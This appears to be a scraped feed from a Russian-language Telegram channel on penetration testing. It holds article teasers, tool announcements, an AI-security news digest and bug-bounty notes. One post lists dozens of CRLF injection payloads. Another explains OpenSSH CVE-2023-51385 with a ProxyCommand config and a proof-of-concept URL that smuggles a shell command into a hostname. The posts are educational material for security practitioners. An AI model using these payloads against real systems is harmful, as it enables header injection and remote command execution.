Похек
16.4K subscribers
2.08K photos
110 videos
243 files
3.06K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @PoxekAds_bot или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
🔥1755👎1🥰1🌚11
😉 Немного про построение векторов атак

Как правило, домен на базе Active Directory обладает значительным количеством объектов, свойств и связей между ними. В общем случае «вручную» выявить недостатки в настройке домена и на их основе построить вероятный вектор атаки является довольно трудоемкой задачей и справится с ней без вспомогательных программных средств не представляется возможным.

В настоящем материале будет представлен обзор некоторых программных средств, использующихся для автоматизированного построения вероятных атак в домене. Кроме того, будут рассмотрены некоторые подходы к улучшению уже имеющихся решений, а также предложен собственный алгоритм к выявлению наиболее приоритетных целей атак.

📌 Важно отметить, что материал рассчитан на читателя, обладающего опытом по тестированию на проникновение Active Directory.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
5🔥4👎1
CRLF Injection Payloads
#заметки

%0AHeader-Test:POXEK
%0A%20Header-Test:POXEK
%20%0AHeader-Test:POXEK
%23%OAHeader-Test:POXEK
%E5%98%8A%E5%98%8DHeader-Test:POXEK
%E5%98%8A%E5%98%8D%0AHeader-Test:POXEK
%3F%0AHeader-Test:POXEK
crlf%0AHeader-Test:POXEK
crlf%0A%20Header-Test:POXEK
crlf%20%0AHeader-Test:POXEK
crlf%23%OAHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8DHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8D%0AHeader-Test:POXEK
crlf%3F%0AHeader-Test:POXEK
%0DHeader-Test:POXEK
%0D%20Header-Test:POXEK
%20%0DHeader-Test:POXEK
%23%0DHeader-Test:POXEK
%23%0AHeader-Test:POXEK
%E5%98%8A%E5%98%8DHeader-Test:POXEK
%E5%98%8A%E5%98%8D%0DHeader-Test:POXEK
%3F%0DHeader-Test:POXEK
crlf%0DHeader-Test:POXEK
crlf%0D%20Header-Test:POXEK
crlf%20%0DHeader-Test:POXEK
crlf%23%0DHeader-Test:POXEK
crlf%23%0AHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8DHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8D%0DHeader-Test:POXEK
crlf%3F%0DHeader-Test:POXEK
%0D%0AHeader-Test:POXEK
%0D%0A%20Header-Test:POXEK
%20%0D%0AHeader-Test:POXEK
%23%0D%0AHeader-Test:POXEK
\r\nHeader-Test:POXEK
\r\n Header-Test:POXEK
\r\n Header-Test:POXEK
%5cr%5cnHeader-Test:POXEK
%E5%98%8A%E5%98%8DHeader-Test:POXEK
%E5%98%8A%E5%98%8D%0D%0AHeader-Test:POXEK
%3F%0D%0AHeader-Test:POXEK
crlf%0D%0AHeader-Test:POXEK
crlf%0D%0A%20Header-Test:POXEK
crlf%20%0D%0AHeader-Test:POXEK
crlf%23%0D%0AHeader-Test:POXEK
crlf\r\nHeader-Test:POXEK
crlf%5cr%5cnHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8DHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8D%0D%0AHeader-Test:POXEK
crlf%3F%0D%0AHeader-Test:POXEK
%0D%0A%09Header-Test:POXEK
crlf%0D%0A%09Header-Test:POXEK
%250AHeader-Test:POXEK
%25250AHeader-Test:POXEK
%%0A0AHeader-Test:POXEK
%25%30AHeader-Test:POXEK
%25%30%61Header-Test:POXEK
%u000AHeader-Test:POXEK
//www.google.com/%2F%2E%2E%0D%0AHeader-Test:POXEK
/www.google.com/%2E%2E%2F%0D%0AHeader-Test:POXEK
/google.com/%2F..%0D%0AHeader-Test:POXEK


🪄 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥92👎1
Картинка из утренней заметки, а то вдруг вы ее пропустили или посчитали неинтересной аннотацию 😊
922👎1
😈 IntruderPayloads

Коллекция полезных нагрузок BurpSuite Intruder, полезных нагрузок BurpBounty, списков fuzz листов и методов пентеста. Чтобы собрать все сторонние репозитории, запустите install.sh в той же директории, где находится папка IntruderPayloads.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
72👎1
Forwarded from PWN AI
👋 привет.

Вот и первый выпуск дайджеста по безопасности ИИ. Материалы честно позаимствованы с hackstery, что-то дополнено и адаптировано. Но надеюсь, вы поставите ⚡️⚡️⚡️ и скажете в комментах – а нужно ли оно ?)

💬 Безопасность LLM

Wunderwuzzi написал статью и выложил PoC для эксфильтрации данных через Google Bard. Он реализовал эксфильтрацию в google docs и обошёл CSP, однако Google уже пофиксили это (((


Layier.AI выпустили свой бенчмарк, в котором при помощи нескольких сканеров промтов оценивается - как тот или иной сканер отработает на Prompt Injection. Среди средств анализа включены следующие инструменты - LLMGuard, Lakera Guard и RebuffAI. Подробнее о том, почему они это сделали – читайте в их статье. Также, они улучшили свою модель Deberta, которая используется для обнаружения Prompt Injection.

Компания Meta* выпустила новые инструменты (Llama Guard и Purple Llama) для защиты входных и выходных данных при взаимодействии с большими языковыми моделями и предложила эталон для оценки рисков кибербезопасности в моделях. (тык, тык и тык)

🎨 Безопасность ИИ

Huntr написали статью для багхантинга в AI/ML. Часть инструментов вы и сами знаете, а часть была описана в этом канале.

Google выпустил инструмент для подписей моделей через Sigstore. Это фреймворк для обеспечения безопасности цепочки поставок машинного обучения.

Trail Of Bits обнаружили 11 уязвимостей в популярной модели для обнаружения объектов в реальном времени YOLOv7. Snyk уже может сканировать эту модель на уязвимости.

Среди этих уязвимостей есть целых 5 RCE.


Для обнаружения исследователи использовали свой набор правил для semgrep, TorchScript и CodeQl.


Помимо этого, они дали рекомендации по защите модели и уже сообщили разработчикам о данных находках.

🛠 Новые инструменты ИИ для кибербезопасности

Cisco выпустила своего AI-ассистента. Этот инструмент призван помочь безопасникам в настройке и поддержке политик брандмауэра в решениях Cisco. Ранее также Microsoft сделали свой Security Copilot

🤔 Интересно почитать

Кто контролирует OpenAI - статья от Bloomberg

🤔Размышления

Заменит ли ИИ безопасника

Жду ваших репостов и комментариев на этот счёт
Please open Telegram to view this post
VIEW IN TELEGRAM
7👎1😈11
🌚 Опасная рыбалка. Как фишинговые ресурсы маскируют под легитимные

Что такое фишинг, зна­ет и стар и млад, но поль­зовате­ли все рав­но про­дол­жают попадать­ся на улов­ки зло­умыш­ленни­ков. В этой статье мы рас­смот­рим фишин­говые ссыл­ки, а точ­нее, спо­собы их мас­киров­ки с исполь­зовани­ем офи­циаль­ных сай­тов извес­тных ком­паний и сер­висов.

От­кры­тым редирек­том в «1С‑Бит­рикс» уже никого не уди­вишь. Давай луч­ше рас­смот­рим, как кибер­прес­тупни­ки умуд­ряют­ся исполь­зовать archive.org, evernote.com, bing.com, microsoft.com, adobe.com и дру­гие трас­товые домены для того, что­бы обма­нуть довер­чивых поль­зовате­лей.

😹 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
5🎄11
🌚 Письмо с сюрпризом. Изучаем уловки и хитрости для доставки писем с малварью

По ста­тис­тике зна­читель­ная часть зараже­ний мал­варью про­исхо­дит из‑за того, что поль­зователь сам запус­тил на сво­ей машине вре­донос­ный файл. Имен­но в этом и зак­люча­ется основная задача зло­умыш­ленни­ков, исполь­зующих соци­аль­ную инже­нерию. Давай пос­мотрим, какие тех­ничес­кие улов­ки и хит­рости они при­меня­ют.

Мы рас­смот­рим ата­ки с фай­лами не с точ­ки зре­ния того, как их дос­тавля­ют во вре­мя пен­теста и что в них пишут, что­бы поль­зователь повел­ся. Об этом мы погово­рим в дру­гой раз. Сегод­ня мы кос­немся нес­коль­ких тех­ничес­ких аспектов, вклю­чая мас­киров­ку фай­лов и рас­ширений, и обсу­дим некото­рые лай­фха­ки.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
82
🌚 OverTheWire Bandit
#лаба

Спонтанный пост для тех, кто ищет чем заняться на выходных)
Полезная головоломка для начинающих специалистов и "повторение - мать учения" для прожжённых самоварчиков.

Смысл сей авантюры в том, что вы с 0 до 34 уровня должны подключаться по ssh к следующему уровню. А как это сделать вам и придется выяснить :))
Эта игра будет полезна в первую очередь для начинающих в освоении Linux на базовом уровне и по ходу решения уровней, сможете постигать тонкости нативных утилит.

ssh [email protected] -p 2220

🌲 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
103👎11
SSH ProxyCommand == RCE
CVE-2023-51385
#RCE

SSH’s ProxyCommand is a feature quite widely used to proxy ssh connections by allowing to specify custom commands to be used to connect to the server. Arguments to this directive may contain tokens like %h, %u which refer to hostname and username respectively.

When coming from untrusted sources, a hostname can be malicious and look something like malicious-command (backticks would allow a command to be executed in shell)

Malicious config:
Host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p


Latest PoC:
url = ssh://'`open -aCalculator`'foo.example.com/bar


Exploit: https://github.com/vin01/poc-proxycommand-vulnerable-v2

For Remediation you need update to:
OpenSSH 9.6p1
libssh 0.10.6 and 0.9.8

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👎10833
Forwarded from AKTIV.CONSULTING
⚡️Не пропустите свежий выпуск подкаста «Безопасный выход»!

Ведущие Анастасия Харыбина, Тимофей Матреницкий и приглашенный эксперт Алексей Петухов обсудили одну из самых актуальных тем для многих компаний — проблему кадрового голода 🍽

Участники подкаста рассмотрели:

откуда взялась проблема нехватки ИБ-кадров;

какие существуют регуляторные требования и профессиональные стандарты, и как они влияют на рынок;

что необходимо сделать для популяризации профессии ИБ-специалиста среди молодежи;

почему компаниям-лидерам отрасли важно объединяться для обмена опытом и лучшими методиками для подготовки сотрудников;

что стоит взять на вооружение организациям для решения проблем кадрового голода.


Смотрите и слушайте, где вам будет удобно:

📹 Youtube

💬 VK Видео

🎧 Аудио


Приятного просмотра и прослушивания!

#подкаст
Please open Telegram to view this post
VIEW IN TELEGRAM
72🔥21
This media is not supported in your browser
VIEW IN TELEGRAM
🌚 БагБаунти с АстраЛинус или то, что нужно знать о защищённости защищённой ОС

Автор захотел поделиться своим опытом участия в программе баг-хантинга ГК Астра (да, да - именно той, которая недавно совершила каминг‑аут IPO) на платформе BI.ZONE Bug Bounty.

Опыта участия в публичных программах поиска багов у него до этого не было, а первичной мотивацией было стремление посмотреть на Astra Linux в контексте информационной безопасности и в целом оценить собственные возможности в поиске дефектов данной ОС, ведь за плечами у него уже был богатый опыт ковыряния ядра да и вообще, линуксов.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
12😈2
💰 С Наступающим Новым Годом!

🌲 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
271152👎1
Forwarded from SecuriXy.kz
#BB #H1 #HackerOne Уходит с Казахстана в плане выплат...
👎11🎉5🥰3🎄3🤩1
🌚 AuthLogParser
#linux #LPE

Если кратко, то скрипт на PowerShell парсит логи на наличие данных авторизации. На первый взгляд классная штука.

Как получится воспользоваться на проекте, отпишу фидбек)

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥911
Forwarded from Blue (h/c)at Café (Женя Белкин '";DROP DATABASE db_name();--)
📝 Аудит спецификаций API на наличие уязвимостей логики

Продолжаем разговор про тестирование API. На этот раз не будет докера, мне было максимально лениво разбираться с Rust, не с игрой, а языком (Go для умных).

Инструмент, которым я буду сам пользоваться называется CherryBomb.

🗣 Краткое описание:

- Написан на Rust
- Имеет варианты запуска (info, normal, intrusive(не работает) , passive, full
- Требуется файл OpenAPI v3  в формате json (можете ваши yml переводить в него тут)

📌

Тестирование проводил всё на том же VAmPI

🗣 Использование:

cherrybomb --file openapi.json --profile full --ignore-tls-errors true -o report.json --format json


🗣 Репорт файл:

Жаль, что я не могу делать развёрнутые посты с несколькими скринами и подобным, но если кратко - умеет в читаемый вид (table), а также в формате json

📌

В скором времени напишу парсер в sarif или для defect dojo

#opensource #devsecops
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1222
Forwarded from PRO:PENTEST
😈 ПРОЕКТНЫЕ КЕЙСЫ:

🔥 ОБХОД СИСТЕМЫ СКУД В БЦ - https://t.iss.one/pro_pentest/11
🔥 КРАЖА ПРОПУСКА - https://t.iss.one/pro_pentest/17
🔥 ВЗЛОМ БАНКА - https://t.iss.one/pro_pentest/19
🔥 ВЗЛОМ КИНОСТУДИИ - https://t.iss.one/pro_pentest/20
🔥 ФИЗИКА С ЗАДЕРЖАНИЕМ ФСБ - https://t.iss.one/pro_pentest/36
🔥 ПРОЕКТ НА МИЛЛИОН - https://t.iss.one/pro_pentest/39
🔥 ВЗЛОМ БАНКА 2 - https://t.iss.one/pro_pentest/75
🔥 ВЗЛОМ ОТЕЛЯ - https://t.iss.one/pro_pentest/88
🔥 ВЗЛОМ НА ВЫСОТЕ - https://t.iss.one/pro_pentest/112

🤔 СТАТЬИ:

💯 ВВЕДЕНИЕ В НЛП ЧАСТЬ 1 - https://t.iss.one/pro_pentest/13
💯 ВВЕДЕНИЕ В НЛП ЧАСТЬ 2 - https://t.iss.one/pro_pentest/16
💯 ШАТАЕМ WI-FI (КАРМАННАЯ ШПОРА) - https://t.iss.one/pro_pentest/64
💯 ФИЗИЧЕСКИЙ ПЕНТЕСТ - https://xakep.ru/2023/01/19/physical-pentest/#toc13
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1721
Forwarded from BI.ZONE Bug Bounty
🏆 No more tears, good vibes only: подводим итоги года

Мы думали-думали, что же такое особенное подарить нашей десятке лучших... А потом как придумали! На двух загадочных фото в посте — подсказка ;)

А это список самых крутых багхантеров на нашей платформе в 2023 году:

1️⃣r0hack
2️⃣al88nsk
3️⃣artebels
4️⃣kwel
5️⃣ub1k
6️⃣BlackFan
7️⃣hodiebee
8️⃣freeman
9️⃣sergeym
1️⃣0️⃣zero-0x00 
1️⃣1️⃣arkiix

Хотим сказать спасибо всем, кто упорно багхантил на платформе весь год и поддерживал нас. 

А всех из десятки от души поздравляем, в ближайшее время свяжемся и отправим подарки.

Stay tuned!

UPD
arkiix влетел в рейтинг уже после подведения итогов, так что наш топ-10 магией Деда Мороза превратился в топ-11. Так держать!
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤‍🔥1🎄11